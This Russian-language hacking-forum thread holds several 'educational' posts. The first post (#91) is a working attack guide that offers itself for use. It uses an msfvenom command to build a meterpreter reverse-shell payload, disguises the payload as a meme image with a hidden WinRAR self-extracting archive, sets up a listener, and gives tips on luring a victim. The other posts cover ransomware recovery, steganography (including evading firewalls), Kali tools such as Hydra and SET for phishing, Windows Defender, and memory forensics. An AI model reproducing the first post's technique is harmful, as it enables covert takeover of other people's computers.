Объявление

Свернуть
Пока нет объявлений.

Blackmast_education

Свернуть
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • #91
    Как хакнуть с помощью картинки




    Вступить в наш чат

    Да что может случится, если открыть картинку? На первый взгляд, ничего страшного. Но если вы прочтете эту статью, то узнаете, что именно таким простым способом можно получить полный контроль над компьютером жертвы, лишив её доступа к своим же собственным файлам. Да-да, и все это с помощью одной лишь картинки.





    Дисклеймер

    Данная статья предназначена только для образовательных целей, не используйте ее во вред другим людям. Мы не несем ответственности за любые ваши действия.
    Требования для взлома

    Найдите любое изображение, которое понравится вашей жертве (мемы, котики, аниме);
    Kali Linux, с помощью которого будет создаваться вредоносное ПО;
    Второй компьютер с Windows, на который должен быть установлен WinRAR.

    Создание полезной нагрузки

    Для создания полезной нагрузки у вас должен быть установлен Kali Linux.

    Прежде всего, откройте терминал, введите msfconsole и подождите, пока он загрузится.

    Затем введите следующую команду, при этом обязательно проверьте свой IP-адрес и скопируйте его.

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR IP ADDRESS> LPORT=555 -f exe -e x86/sikata_ga_nai -i 10 > <PAYLOAD NAME>.exe





    После этой команды ваша полезная нагрузка будет создана.
    Прикрепляем полезную нагрузку к картинке

    Теперь переключитесь на компьютер с Windows, на котором уже установлен WinRAR.

    Итак, у вас есть 2 файла, а именно файл картинки, которую вы скачали, и полезная нагрузка, которую мы создали.

    Введите в браузере «icon maker» или перейдите по этой ссылке. После этого создайте иконку загруженной вами картинки.

    Итого у вас уже есть все 3 файла, которые нам понадобятся, поэтому теперь выберите полезную нагрузку, картинку и щелкните их правой кнопкой мыши, затем нажмите «добавить в архив».

    После этого последовательно выполните пункты:

    Во вкладке «Общие» нажмите «Создать массив SFX»;
    Кликнете по вкладке «Дополнительно» и выберите «Дополнительные параметры SFX»;
    Далее во вкладке «Обновление» нажмите «Извлечь и обновить файлы»;
    В «Настройках» вы увидите два пункта, а именно «Выполнить после извлечения» и «Выполнить перед извлечением»;
    В пункте «Выполнить после извлечения» напишите полное имя файла изображения вместе с типом файла. Подтвердите и после этого напишите имя файла полезной нагрузки с типом файла;
    Затем во вкладке «Текст и значок» снизу вы увидите «Загрузить значок SFX из файла», нажмите и выберите иконку, который вы создали из картинки;
    Во вкладке «Режимы» нажмите «Скрыть все» и кликнете «ОК».
    Теперь откроется окно WinRAR; там, во вкладке «Общие», измените имя на любое, которое вы хотите, а также укажите расширение, например, котики.jpg.

    Готово! Вы успешно создали полезную нагрузку.

    Теперь пришло время создать прослушиватель, который будет создавать отчет по запросам.
    Создание прослушивателя

    Откройте новый терминал и введите msfconsole после завершения загрузки;
    Напишите «use multi/handler» —> «Enter»;
    Затем введите «set payload windows/meterpreter/reverse_tcp» и нажмите Enter;
    Введите «show options», чтобы увидеть, что требуется для настройки слушателя;





    Теперь он запросит LHOST и LPORT; напишите LHOST, который вы написали при создании полезной нагрузки, и то же самое касается LPORT.
    Далее введите «выполнить» и нажмите «Enter».

    Социальная инженерия

    Все готово, и остаётся только подумать о том, как заставить жертву открыть вашу картинку. На самом деле, с изображением дела обстоят куда лучше, чем с ссылками, так как многие люди даже не подозревают, что за картинкой с мемом может скрываться вредоносный файл.

    И наконец, как только ваша жертва откроет файл, вы получите запрос от вашего слушателя. Вы успешно взломали компьютер.

    Этот метод возможен только в том случае, если жертва и вы подключены к одной и той же сети. Если вы хотите атаковать кого-то, кто не находится в вашей сети, вам придется изменить несколько параметров. Об этом поговорим в другой раз.

    На этом все. Удачи!


    Последний раз редактировалось BlackMAST; 25-01-2023, 10:18.

    Комментарий


    • #92
      Атаки программ-вымогателей: пошаговое руководство по безопасности.




      Вступить в наш чат

      Представьте, что вам приходит сообщение от злоумышленника, в котором содержится вредоносное вложение с кодом, который скачивает программу-вымогатель, как только вы открываете файл. «И что происходит дальше?», - спросите вы. Программа-вымогатель просканирует важные файлы и зашифрует их так, что вы не сможете расшифровать их без ключа, за доступ к которому злоумышленник потребует выкуп. Вымогательское ПО наносит урон быстрее, чем любые другие вредоносные приложения.
      Но не стоит впадать в панику, потому что сегодня мы расскажем вам, что вы должны делать, если подверглись нападению такой программы, и как впредь защитить свою систему от возможных атак.





      Не следует сразу прибегать к профессиональной помощи или, что ещё хуже, идти на поводу злоумышленников и отправлять им деньги, потому что вы сами в состоянии справится с вторжением вредоносной программы. Просто следуйте нижеуказанным пунктам, и у вас все получится.
      1️⃣ Заблокируйте свою сеть

      Самое первое, что вы должны сделать, это изолировать зараженный компьютер от сети. Поскольку 90% кибератак зашифровывают сетевой жесткий диск, все другие устройства, подключенные к той же сети могут тоже пострадать.

      Итак, вы должны включить брандмауэр, тем самым защититься от несанкционированного доступа или использовать самый традиционный метод — отключить ПК от розетки. В этой ситуации главное предотвратить дальнейшее распространение программы-вымогателя.
      2️⃣ Не переносите новые файлы в зараженную систему

      Никогда не переносите файлы в зараженный компьютер, так как существует множество программ-вымогателей, которые шифруют в режиме реального времени, поэтому любые новые файлы, которые вы переносите в систему, тоже подвергнутся атаке.

      Это типичная ошибка, которую совершают многие люди, поскольку они думают, что атака уже завершена, и угроз больше нет, поэтому удаляют зараженные файлы и восстанавливают исходные файлы из резервной копии. Однако, все это приводит к шифрованию этих восстановленных файлов, потому что программа-вымогатель все еще активна.
      3️⃣ Остановите работу программы

      Вам необходимо избавиться от активного вредоносного ПО в системе, для этого вы можете прибегнуть к помощи антивируса. Но делать это нужно с особой осторожностью, потому что не каждый антивирус сможет локально удалить исполняемый файл, не тронув сами файлы или даже ключевой файл, навсегда их зашифровав. Будьте внимательны при запуске сканирования и не удаляйте никакие ключевые, текстовые файлы или заметки о выкупе, просто удалите исполняемый файл.

      Вы, должно быть, подумали: «Это все, конечно, хорошо, но как я могу расшифровать свои файлы?».
      4️⃣ Проверьте варианты расшифровки

      Теперь самое время проверить, возможно ли самостоятельно расшифровать ваши файлы.

      Поскольку исследователи безопасности взломали большое количество программ-вымогателей, они также создали расшифровщик, который находится в свободном доступе, так что скорее всего вы можете расшифровать зараженные файлы без уплаты выкупа.

      Существует потрясающий сайт, который не только расскажет вам, какая у вас программа-вымогатель, но и даже даст вам ссылку для скачивания дешифратора.

      Сайт называется ID Ransomware. Он бесплатный и очень простой в использовании.





      5️⃣ Убедитесь, что у вас есть резервные копии

      Если вы читаете дальше, то предыдущий шаг вам, к сожалению, не помог. Да, есть несколько программ-вымогателей, которые до сих пор невозможно взломать, и исследователи безопасности все еще работают над ними. Поэтому, если вы подверглись нападению таких программ-вымогателей, лучше удалите все файлы и перезагрузите систему, убедившись, что у вас есть резервная копия файлов.

      Если у вас нет резервной копии, обязательно посетите эту страницу, заполните данные и отправьте. Вам пришлют письмо после того, как создадут дешифратор, который вернет ваши файлы. Это трудоемкий процесс, поэтому запаситесь терпением.





      6️⃣ Переговоры с нападающим

      Если ждать не ваш вариант, и вам срочно нужны файлы, то вы всегда можете заплатить выкуп. Однако, мы не советуем этого делать, но и останавливать вас не имеем права. Единственное, что мы можем посоветовать, так это попробовать договориться с злоумышленниками, поскольку было замечено, что они часто снижают первоначальную цену.
      Но даже если вы выплатите всю нужную сумму, нет никаких гарантий, что злоумышленники отправят вам подлинный дешифратор, а не какой-нибудь левый, который даже не запустится на вашем ПК. Итого: вы потратите деньги и останетесь ни с чем, поэтому оставьте эту затею и дождитесь помощи от команды ID Ransomware.


      Вот мы и подошли к концу сегодняшней темы. Мы верим, что данная статья помогла вам противостоять атаке программ-вымогателей, и вы узнали, что делать, если вдруг вы подвергнитесь подобной атаке, что мы надеемся никогда не произойдет, но как гласит цитата на сайте ID Ransomware:
      «Знание - половина победы».


      Последний раз редактировалось BlackMAST; 25-01-2023, 10:18.

      Комментарий


      • #93
        Steghide: Прячем секретные файлы в изображениях или аудио




        Вступить в наш чат

        Стеганография — это метод, используемый для сокрытия файлов и конфиденциальных данных внутри изображения, чтобы их можно было передавать, не вызывая никаких подозрений. Этот метод является одним из основ криптографии, и в этой статье мы покажем вам, как скрыть файлы в фотографии или аудиозаписи с помощью Steghide и Kali Linux.





        Как зашифровать файлы в Kali Linux

        Для начала давайте разберемся, как же все-таки работает стеганография.

        Главная задача стеганографии - это спрятать файлы и данные внутри изображения так, чтобы сам факт их существования был скрыт. Для этого файлы шифруются с помощью ключа доступа, для расшифровки которого требуется другой ключ на стороне получателя. Таким образом, никто не сможет обнаружить то, что вы утаили, для просмотра данных человеку потребуется ключ дешифрования.

        В процессе шифрования нам потребуется специальный инструмент Steghide, использующий код доступа для скрытия информации внутри изображений.

        Особенности Steghide:

        сжатие и шифрование встроенных данных;
        поддержка файлов JPEG, BMP, WAV и AU (да, он поддерживает даже аудиофайлы).

        Теперь, когда мы ознакомились с теоретической частью, можем начинать.


        Шаг 1: Откройте терминал Kali Linux и клонируйте репозиторий steghide:

        apt-get install steghide

        Шаг 2: Загрузите изображение, в котором будете прятать файл.

        Шаг 3: В терминале Kali Linux измените рабочий каталог на Desktop, используя следующую команду:

        cd Desktop

        Шаг 4: Убедитесь, что оба файла, то есть изображение JPG, и текстовый файл находятся в одном рабочем каталоге. В этом руководстве используется каталог Desktop. Вы можете выбрать любой.





        Мы скачали изображение и назвали его girl.jpg. Файл, который будем прятать — secret.txt.

        Шаг 5: Введите steghide или steghide -h, чтобы отобразить все возможности инструмента.

        Шаг 6: Теперь введите следующие команды, чтобы вставить наш файл в изображение с паролем:





        Шаг 7: Steghide запросит у вас кодовую фразу/пароль. Таким образом, вы можете ввести любой пароль, который вам нравится, а затем повторно ввести ту же фразу-пароль для подтверждения, нажав Enter.

        Вы получите следующий вывод на своем терминале:





        Шаг 8: Готово! Вы успешно спрятали файл в изображении.


        Как расшифровать файл с помощью Kali Linux:

        Шаг 1: Чтобы расшифровать файл, перейдите в свой терминал Kali Linux и введите следующую команду:

        steghide extract -sf girl.jpg





        Шаг 2: Теперь введите пароль/кодовую фразу, чтобы посмотреть файл. Вам нужен правильный пароль, иначе файл не откроется.


        Поздравляем, вы изучили основы стеганографии и использования steghide в Kali Linux. Теперь вы можете скрыть файлы в изображениях и даже в аудиофайлах (принцип тот же), используя steghide.


        Комментарий


        • #94
          5 инструментов Kali Linux для начинающего взломщика




          Вступить в наш чат

          Ищете инструменты, которые смогли бы автоматизировать и облегчить вашу работу? Вы попали точно по адресу, сегодня мы расскажем вам о топовых инструментах, которые способны значительно сэкономить время и порадовать своей эффективностью. Речь пойдет об инструментах, которые предустановлены вместе с Kali Linux. В Kali Linux включено более 500 инструментов, которые могут использоваться для взлома и тестирования на проникновение. Разбегаются глаза от всего этого многообразия? Остановитесь, ведь мы собрали для вас только лучшие из лучших.

          Готовы? Тогда поехали!





          1. Burp Suite

          Burp Suite — один из наиболее широко используемых инструментов тестирования безопасности веб-приложений.

          Этот инструмент используется в качестве прокси, что означает, что все запросы от браузера прокси будут проходить через него. Поскольку запросы выполняются через Burp Suite, мы можем вносить изменения в запросы по мере необходимости. И эта функция делает этот инструмент полезным для тестирования уязвимостей, таких как XSS, SQLI и других проблем, связанных с Интернетом.

          Существует бесплатная версия, которая поставляется с предустановленной Kali Linux, но есть также и премиум-версия под названием Burp Suite Professional, которая имеет гораздо больше функций.
          Как использовать Burp Suite?

          Чтобы использовать Burp Suite, выполните следующие действия:

          Загрузите ПК с Kali Linux.
          Откройте терминал.
          Введите там следующее, чтобы запустить «Burp Suite»: burpsuite





          2. Nmap

          Nmap, также известный как Network Mapper, — очень простой инструмент сканирования с открытым исходным кодом в Kali Linux. Этот инструмент позволяет нам сканировать систему или сеть; сначала он отправляет пакеты на компьютер хоста, а затем анализирует ответ, чтобы получить желаемый результат.

          Инструмент Nmap — один из лучших и наиболее широко используемых инструментов для сканирования и тестирования на проникновение.
          Как использовать NMAP?

          Чтобы использовать NMAP, выполните следующие действия:

          Загрузите ПК с Kali Linux.
          Откройте терминал.
          Введите следующее, чтобы запустить «NMAP»: nmap <целевой IP-адрес>

          Подробнее об этом инструменте читайте в нашей авторской статье по ссылке.





          3. Wireshark

          Wireshark — один из самых известный инструментов Kali Linux. Его еще обычно называют «сниффером сети»; подразумевается, что он перехватывает и анализирует пакеты. Этот инструмент используется для сетевого анализа, который необходим для безопасности. Он способен анализировать данные, отправляемые по сети в виде пакетов. Каждый пакет имеет подробную информацию, которая включает в себя источник, IP-адрес, время передачи, тип используемого протокола и другие данные. Эти файлы имеют расширение «pcapp», которые могут быть проанализированы только Wireshark.
          Как использовать Wireshark?

          Чтобы запустить и использовать Wireshark, сделайте следующее:

          Загрузите ПК с Kali Linux.
          Откройте терминал.
          Введите эту команду, чтобы запустить «Wireshark»: wireshark
          Загрузите демонстрационный файл «pcapp».
          Затем нажмите «Ctrl + 0», чтобы открыть файл «pcapp» в wireshark.
          После чего, вы найдете список пакетов и их содержимое.





          4. Aircrack NG

          Это универсальный анализатор пакетов, взломщик WEP и WPA и инструмент захвата хэша. Aircrack чаще всего используется для взлома Wi-Fi, но на этом его возможности не заканчиваются: вы можете использовать его для захвата пакетов, а также взламывать хэши с помощью различных атак, например, таких как атаки по словарю. Он поддерживает практически все современные беспроводные интерфейсы.
          Как использовать Aircrack NG?

          Чтобы использовать этот инструмент, выполните следующие действия:

          Загрузите машину с Kali Linux.
          Откройте терминал.
          Введите следующее: aircrack-ng





          5. SET

          SET, или Social Engineering Toolkit, представляет собой среду тестирования на проникновение с открытым исходным кодом, предназначенную для социальной инженерии. Он имеет набор инструментов, которые можно использовать для сбора информации о жертве, эксплуатируя и манипулируя человеческой природой. Это также один из лучших инструментов для проведения фишинговых атак.
          Как использовать инструмент социальной инженерии?

          Чтобы использовать SET, выполните следующие действия:

          Загрузите свой ПК с Kali Linux, SET уже предустановлен.
          Откройте терминал.
          Введите: sudo settoolkit

          Вы увидите набор опций, которые вы можете использовать для выполнения своих атак.






          Комментарий


          • #95
            Эти инструменты прокачают твой Kali Linux




            Вступить в наш чат

            Ищете инструменты, которые смогли бы автоматизировать и облегчить вашу работу? Вы попали точно по адресу, сегодня мы расскажем вам о топовых инструментах, которые способны значительно сэкономить время и порадовать своей эффективностью. Речь пойдет об инструментах, которые предустановлены вместе с Kali Linux. В Kali Linux включено более 500 инструментов, которые могут использоваться для взлома и тестирования на проникновение. Разбегаются глаза от всего этого многообразия? Остановитесь, ведь мы собрали для вас только лучшие из лучших.

            Готовы? Тогда поехали!

            1. Metasploit

            Metasploit — это инструмент с открытым исходным кодом, который является одним из наиболее широко используемых инструментов для тестирования на проникновение во всем мире. В основном, Metasploit - это инструмент командной строки, но он также включает в себя пакет с графическим интерфейсом, известный как «Armitage», что делает его использование более удобным и продуктивным. Этот инструмент содержит большое количество эксплойтов для тестирования уязвимостей сети или операционной системы.

            Как использовать Metasploit?

            1. Загрузите ПК с Kali Linux.
            2. Откройте терминал.
            3. Для запуска «Metasploit» введите: msfconsole





            2. Netcat

            Netcat, также известный как NC, представляет собой сетевой инструмент, который выполняет сканирование портов, передачу файлов и получает данные о хосте. Netcat использует порты TCP или UDP. Также его называют «швейцарским ножом хакера», поэтому его всегда стоит иметь под рукой.

            Как использовать Netcat?

            1. Загрузите ПК с Kali Linux.
            2. Откройте терминал.
            3. Введите: sudo nc или sudo netcat





            3. Hydra

            Hydra поддерживает огромное количество служб, благодаря своей быстроте и надёжности этот инструмент заслуживает вашего внимания. Hydra подбирает пароли методом брутфорса к более чем 30 протоколам, включая telnet, ftp, http, https, smb и т.д.

            Как использовать Гидру?

            1. Загрузите ПК с Kali Linux.
            2. Откройте терминал.
            3. Введите: sudo hydra





            4. John The Ripper

            John The Ripper или Джон Потрошитель — это инструмент с открытым исходным кодом, используемый для взлома паролей во время тестирования на проникновение. JTR (John The Ripper) доступен не только для Linux, но и для различных других операционных систем.

            Его основным предназначением является аудит слабых паролей методом перебора. Он имеет свои собственные словари возможных паролей, доступные на 20 языках. Эти словари предоставляют большое количество возможных паролей, из которых можно создать хеш-значения, чтобы угадать целевой пароль. Поскольку использование одного и того же пароля на большинстве сайтов стало тенденцией, взлом одного пароля чаще всего становится ключом от всех дверей. Этот инструмент сначала шифрует данные, а затем проверяет совпадение хеш-значений; если проверка закончится успешно - у вас есть пароль; если нет, то проверка будет продолжена.

            Как использовать Джона Потрошителя?

            1. Загрузите ПК с Kali Linux.
            2. Откройте терминал.
            3. Введите: sudo john.





            5. SQL Map

            SQL Map — это инструмент с открытым исходным кодом, используемый при тестировании на проникновение для обнаружения и использования бреши «SQL Injection». Эти атаки могут получить контроль над базой данных, использующей SQL, и они могут повлиять на любое веб-приложение или веб-сайт, к которому подключена база данных SQL.

            Базы данных SQL включают mySQL, SQL Server, Oracle и многие другие, и они содержат конфиденциальную информацию, которая в случае утечки повлияет на многих пользователей. Поэтому для поиска и защиты от этих уязвимостей как нельзя более кстати приходится SQLMap.

            Как использовать SQLMap:

            1. Загрузите ПК с Kali Linux.
            2. Откройте терминал.
            3. Введите: sudo sqlmap





            Заключение:

            Если вы хотите стать экспертом по кибербезопасности, вы должны хорошо знать Kali Linux и его инструменты. Знание и умение пользоваться инструментами поможет вам в решение многих задач, будь то сбор информации, тестирование на проникновение, фишинг, взлом или что-то еще.

            Это лишь неполный список инструментов, необходимых для того, чтобы лучше освоить Kali Linux. Мы надеемся, что вы узнали из этой темы об инструментах, о которых раньше не догадывались. На этом все. Удачи!




            Последний раз редактировалось BlackMAST; 02-02-2023, 15:47.

            Комментарий


            • #96
              Безопасность Windows: миф или реальность?




              Вступить в наш чат

              Достаточно ли эффективна система безопасности Windows, чтобы защитить вас от вредоносных программ и вирусов? Чтобы ответить на этот вопрос, давайте изучим «Безопасность Windows» и посмотрим, что она делает.

              Итак, давайте начнем.





              Безопасность Windows

              Если раньше большинство пользователей скептически относились ко встроенной защите Windows, то сейчас же их мнение изменилось.

              За последнее время многие технические обозреватели дали Windows Безопасности положительную оценку за быстрое обнаружение и остановку вирусов и вредоносных программ, более того некоторые даже оценивают ее выше, чем платные антивирусные программы.





              Как же Windows удается добиться такой высокой защиты? Все дело в двух подходах, которые она задействует.

              Во-первых, Windows проверяет подписи в базе данных. Microsoft несколько раз в день публикует обновления для ПК с сигнатурами вирусов, после чего служба безопасности Windows загружает эти сигнатуры и сравнивает их с возможными угрозами.

              Второй подход — использование «эвристики». Это означает, что Windows анализирует поведение программы без использования конкретных определений или сигнатур. Таким образом, если уязвимость нулевого дня или необнаруженная угроза проникнет в вашу систему Windows, то Безопасность Windows скорее всего заблокирует её, даже если ранее она никогда не была замечена.





              Результаты сравнительного теста AV
              Уязвимости Безопасности Windows

              Безопасность Windows довольно эффективна для обычных пользователей, но все же имеет некоторые уязвимости. Например, она довольно сильно зависит от возможности подключения к серверам Microsoft и доступа к данным о вредоносном ПО, хранящимся в облаке. Недавний сравнительный тест AV показал, что Безопасность Windows обнаружила только 2/3 угроз при потере подключения к Интернету, что отстает от большинства платных конкурентов, которые хранят большую часть своих ресурсов локально.

              Конечно, вы сейчас скажете, что мы все время проводим онлайн, но вы только представьте ситуацию, что вы по незнанию загрузили вредоносное ПО, а затем оно решило действовать именно в тот момент, когда вы не были подключены к сети, потому что забыли заплатить за Интернет или у вас отключили электричество.

              Кроме того, популярные платные антивирусы предоставляют вам дополнительные функции, такие как VPN или мониторинг вашей домашней сети на наличие уязвимостей, чем Windows, к сожалению, не может похвастаться.
              Безопасность конечных точек

              Конечные точки — это устройства, которые подключаются к вашей сети и обмениваются с нею данными. Например, это могут телефоны, наушники, колонки и т.д. Когда устройство (например, ноутбук) подключается к сети, поток информации между ними во многом напоминает разговор между двумя собеседниками по телефону.

              Киберпреступники выбирают конечные точки для атак, поскольку они позволяют получить доступ к основному устройству и являются более уязвимыми по своей природе. Именно по этим причинам безопасность конечных точек крайне важна.
              В наши дни безопасность конечных точек обеспечивается растущим числом компаний, таких как «CrowdStrike», «HP Wolf Security», «Central 1», «FireEye» и даже «Microsoft».

              Но при этом защита должна включать в себя не только обычные функции антивируса от вредоносных программ, но и расширенные функции:

              автоматическое восстановление BIOS системы в случае атаки;
              более тщательное изучение файлов для обнаружения вредоносного кода;
              изолированность процессов в памяти, чтобы вредоносное ПО не могло распространиться на другие части системы;
              поддержание работы программного обеспечения безопасности с аппаратным контролем, даже если операционная система скомпрометирована.

              Заключение

              Безопасность Windows совершенствуется и развивается на глазах. Еще недавно никто и подумать не мог, что Microsoft встанет в одном ряду с популярными антивирусными программами по уровню защиты и безопасности. Если вы являетесь обычным пользователем ПК, память которого не заполнена жизненно важными файлами, которые нельзя скомпрометировать любой ценой, то продолжайте, как и раньше, использовать Windows. Но даже несмотря на хорошую защиты, все же не стоит пренебрегать антивирусом, который лишь усилит сохранность и безопасность вашей системы.


              Комментарий


              • #97
                Компьютерная криминалистика: о чем молчит ваш ПК?




                Вступить в наш чат

                Вы когда-нибудь задумывались, что может случиться, если ваш компьютер попадает в чужие руки? А вы знали, что даже выключенный ПК может рассказать много неожиданных вещей, как о себе, так и о его владельце? Все дело в оперативной памяти, которая некоторое время хранит информацию.

                Наряду с ростом кибератак повышается необходимость быстро находить и устранять угрозу. В этой деле поможет криминалистика оперативной памяти. Если ваш компьютер подвергся взлому, а вы даже об этом не догадывались — анализ памяти это покажет.

                В этой статье мы расскажем:

                Что такое криминалистика оперативной памяти?
                Важна ли криминалистика RAM?
                Как создать дамп памяти системы.
                Что такое Volatility?
                Как использовать Volatility.

                Итак, поехали.





                Криминалистика оперативной памяти

                Криминалистика оперативной памяти — это процесс анализа содержимого энергозависимой памяти (ОЗУ) компьютера с целью выявления последней активности и любых вредоносных вторжений. Энергозависимая память временно хранит данные, поэтому она может предоставить ценную информацию о том, что происходило на компьютере в последнее время. Вы, возможно, удивитесь, но в ней какое-то время хранится очень много всего интересного: сообщения; комментарии, оставленные на форумах; информация о последних скаченных файлах; картинки; страницы веб-сайтов; ключи, с помощью которых можно расшифровать содержимое криптоконтейнеров и многое другое. А если ваш ПК был заражен вирусом или подвергся взлому, то это тоже станет известно с помощью криминалистического анализа оперативной памяти.





                Важна ли криминалистика RAM

                На этот вопрос есть простой ответ: да!

                Криминалистика оперативной памяти очень важна, поскольку она позволяет обнаруживать и предотвращать кибератаки в режиме реального времени. В отличие от традиционных методов судебной экспертизы, которые анализируют данные, уже записанные на диск, криминалистика RAM анализирует только те данные, которые используются в данный момент.

                Это означает, что вы можете быстро и эффективно находить любые вредоносные программы и вирусы и предпринимать необходимые шаги для предотвращения дальнейшего ущерба.
                Как создать дамп памяти системы

                Для того, чтобы начать работу с оперативной памятью, нам нужно создать дамп памяти компьютера. Для этого мы будем использовать инструмент под названием «DumpIt».


                Когда мы говорим «память», то имеем в виду оперативную или энергозависимую память, в которой хранятся все запущенные в данный момент процессы или программы. Основная идея заключается в том, что если в системе есть какие-либо вирусы или вредоносные программы, то они обязательно себя покажут.

                Скачайте и запустите программу, после запуска «DumpIt» запросит подтверждение на получение доступа ко всем данным, которые в настоящее время работают на вашем ПК, и затем сохранит их в виде файла.

                Кроме того, следует упомянуть еще один инструмент — «FTK Imager», бесплатный криминалистический инструмент. Он также позволяет анализировать память.

                Поэтому, если по какой-либо причине «DumpIt» не дает вам нужного результата или вы столкнулись с некоторыми ошибками, вы можете использовать один из этих инструментов: диспетчер задач Windows, инструмент SysInternals, RAM Capture и FTK Imager.




                FTK Imager


                Что такое Volatility




                Volatility — это платформа с открытым исходным кодом, которую можно использовать для проведения криминалистической экспертизы оперативной памяти на компьютере. Это отличный инструмент для анализа дампов памяти, который поможет вам определить, был ли взломан ваш компьютер.
                Как использовать Volatility

                Теперь, когда файл выгружен мы можем начинать анализ с помощью инструмента с открытым исходным кодом Volatility:

                Загрузите и установите последнюю версию Volatility с официального сайта.
                Определите профиль. Чтобы правильно определить профиль для анализируемого дампа памяти, запустите команду «imageinfo».
                Проанализируйте дамп памяти. После того, как вы определили профиль, вы можете начать анализ дампа памяти, используя различные плагины, предоставляемые Volatility. Некоторые распространенные плагины включают pslist, psscan и netscan, которые предоставляют информацию о запущенных процессах, сетевых подключениях и другую системную информацию.
                Изучите результаты. Программа выдаст вам результаты анализа, которые скажут, был ли ваш компьютер взломан или нет.

                Заключение

                Компьютерная криминалистика — мощный инструмент для обнаружения и предотвращения кибератак. Используя Volatility для проведения криминалистического анализа оперативной памяти на вашем ПК, вы можете быстро и эффективно обнаружить любые признаки вредоносной активности и предпринять необходимые шаги для предотвращения дальнейшего ущерба. Таким образом, если вы подозреваете, что ваш компьютер был взломан, проведите криминалистический анализ, чтобы предотвратить кибер-угрозы.


                Комментарий


                • #98
                  Стеганография: прячем файлы от любопытных глаз




                  Вступить в наш чат


                  Еще с древних времен люди задавались вопросом, как зашифровать послание и утаить его от посторонних глаз. С тех пор методы и способы защиты изменились, но суть осталась неизменной. Когда речь заходит о надежной защите файлов и информации, то в дело вступает стеганография. С помощью нее вы можете спрятать свои конфиденциальные файлы в аудио- и видеозаписях или изображениях.

                  В этой статье вы узнаете:

                  Что такое стеганография?
                  Зачем использовать стеганографию?
                  Как использовать стеганографию?
                  Как скрыть секретную информацию в изображении?
                  Как скрыть секретную информацию в аудиофайле?





                  Что такое стеганография

                  Слово «стеганография» происходит от греческих слов steganos (секрет, тайна) и graphy (запись) и дословно переводится как «тайнопись».

                  Стеганография — это метод сокрытия секретных данных в другом файле, таком как изображение, аудио- или видеозапись.

                  Цель стеганографии — спрятать конфиденциальную информацию и, таким образом, защитить её от третьих лиц.

                  В отличие от шифрования, которое лишь защищает файлы с помощью ключа, стеганография скрывает сам факт их существования.
                  Зачем использовать стеганографию?

                  Причин для использования стеганографии очень много, но основная — это маскировка личных данных и защита конфиденциальной информации.

                  Стеганография подразумевает хранение секретных файлов на видном месте. Люди маскируют важные данные под, казалось бы, обычный файл, такой как фотография или аудиозапись, чтобы сделать их незаметными для других. Скрывая данные в другом файле, стеганография обеспечивает дополнительный уровень безопасности.

                  Стеганографию также можно использовать для обхода брандмауэров и других мер безопасности, которые могут блокировать или ограничивать передачу определенных типов файлов.
                  Как использовать стеганографию?

                  Чтобы использовать стеганографию, в первую очередь нам понадобится любой файл-обманка, такой как изображение или аудиозапись и программа для стеганографии.

                  После чего мы закодируем наши секретные данные в файл-обманку, что приведет к созданию нового файла, содержащего исходный файл и наши скрытые данные. Теперь, если мы хотим получить доступ к секретным данным, мы просто используем программу стеганографии для декодирования файла, где вводим пароль, который установили в процессе кодирования. Если пароль совпадет, то секретные данные будут извлечены и доступны для вас.
                  Как скрыть секретную информацию в изображении?

                  Существует несколько инструментов для сокрытия секретной информации в изображениях с помощью стеганографии. Вот несколько популярных инструментов, которые помогут вам в этом:

                  OpenStego:

                  Это бесплатный инструмент стеганографии с открытым исходным кодом, который поддерживает широкий спектр форматов изображений и аудио.

                  QuickStego:

                  Удобный инструмент стеганографии, который позволяет скрывать текст или файл внутри изображения.

                  SteganoGraph:

                  Он поддерживает несколько форматов файлов изображений и включает в себя такие функции, как шифрование и защита паролем.

                  F5 Steganography:

                  Инструмент использует специальную комбинацию для защиты, чтобы данные были хорошо скрыты и поддерживает различные форматы изображений.

                  Steg:

                  Инструмент стеганографии на основе командной строки, где вы также можете найти большое количество доступных форматов файла.

                  Вы можете выбрать для себя любой из этих инструментов, но мы же покажем, как работает стеганография на примере «OpenStego версии-0.8.6».





                  Итак, чтобы скрыть секретную информацию в изображении с помощью «OpenStego», выполните следующие действия:

                  Скачайте файл изображения, который будет служить обложкой для нашего секретного файла. Во втором поле вставьте путь к файлу обложки;
                  Затем скопируйте путь к секретному файлу и вставьте его в первое поле;
                  В третьем поле от вас требуется указать место, где вы сохраните зашифрованный файл;
                  Выберите алгоритм шифрования или оставьте исходный AES128;
                  Придумайте и запомните пароль, которые вы будете вводить каждый раз, чтобы получить доступ к секретному файлу.

                  Извлечение данных





                  Извлечение данных не составит трудностей; вам просто нужно запомнить путь к изображению, в котором вы скрыли ваши данные.

                  После чего выберите папку, в которую вы хотите извлечь скрытые файлы, и вставьте путь во второе поле. Наконец, вы должны ввести пароль, который вы использовали для скрытия данных и нажать «Извлечь данные». Вы закончили извлечение скрытых файлов из картинки.
                  Как скрыть секретную информацию в аудиофайле?

                  Вы можете использовать различные инструменты, чтобы скрыть секретную информацию в аудиофайле. Сейчас мы расскажем вам о лучших из них:

                  OpenStego:

                  Это бесплатный инструмент с открытым исходным кодом, который поддерживает несколько форматов аудиофайлов и предоставляет удобный интерфейс для сокрытия и извлечения секретной информации. Его же мы использовали и для сокрытия информации в изображении.

                  Audio Steganography:

                  Бесплатный инструмент для стеганографии аудио, который можно использовать для сокрытия секретной информации в аудиофайлах WAV.

                  MP3Stego:

                  Это бесплатный инструмент, который можно использовать для сокрытия секретной информации в аудиофайлах MP3.

                  DeepSound:

                  Хотя этот инструмент является платным, он имеет ряд расширенных возможностей для засекречивания вашей личной информации.

                  Выбирайте любой инструмент на свое усмотрение, а мы же будем использовать «DeepSound2.0».





                  Выполните следующие шаги, если вы используете «DeepSound2.0», если же у вас другой инструмент, то все равно ознакомьтесь с пунктами, написанными ниже, так как последовательность их выполнения зачастую совпадает.

                  Вам понадобится аудиофайл, который будет служить прикрытием для вашего секретного файла. Для этого выберите аудио с помощью кнопки «Open carrier files».
                  Затем нажмите кнопку «Add secret files» и добавьте свои секретные файлы.
                  Далее ищем кнопку с надписью «Encode secret files» и нажимаем ее. После этого появится окно, одетая сможете выбрать желаемый формат аудио или же оставить как есть.
                  Обязательно добавьте пароль; для этого вам нужно поставить галочку рядом с «Encrypt secret files (AES 256)».
                  Затем введите свои пароли нажмите кнопку «Encode secret files».
                  Теперь вы успешно закодировали свои секретные файлы внутри выбранного аудио.





                  Извлечение данных

                  Для извлечения данных вам потребуется выбрать зашифрованный аудиофайл, нажав кнопку «Open carrier files». Как только вы откроете зашифрованный файл, он запросит пароль.





